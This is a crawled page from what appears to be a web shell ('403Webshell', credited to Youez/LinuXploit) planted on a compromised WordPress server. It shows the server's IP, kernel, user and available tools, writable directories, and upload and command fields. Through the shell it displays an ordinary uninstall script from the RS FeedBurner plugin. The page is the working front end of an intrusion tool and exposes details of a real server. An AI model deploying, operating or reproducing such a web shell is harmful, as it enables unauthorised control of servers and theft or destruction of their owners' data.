403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/alongwineroad/wp-content/plugins/rs-feedburner/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/alongwineroad/wp-content/plugins/rs-feedburner/uninstall.php
<?php
/*
RS FeedBurner - uninstall.php
Version: 1.5.1

This script uninstalls RS FeedBurner and removes all options and traces of its existence.
*/

if ( !defined( 'WP_UNINSTALL_PLUGIN' ) ) { exit(); }

function rsfb_uninstall_plugin() {
	/* Delete Options */
	$rsfb_option_names = array( 'rs_feedburner_version', 'rs_feedburner_settings', 'rs_feedburner_token', 'rsfb_admin_notices' );
	foreach( $rsfb_option_names as $i => $rsfb_option ) { delete_option( $rsfb_option ); }
	/* Delete User Meta */
	$del_user_meta = array( 'rsfb_nag_status', 'rsfb_nag_notices' );
	$user_ids = get_users( array( 'blog_id' => '', 'fields' => 'ID' ) );
	foreach ( $user_ids as $user_id ) { foreach( $del_user_meta as $i => $key ) { delete_user_meta( $user_id, $key ); } }
	}

rsfb_uninstall_plugin();

?>

Youez - 2016 - github.com/yon3zu
LinuXploit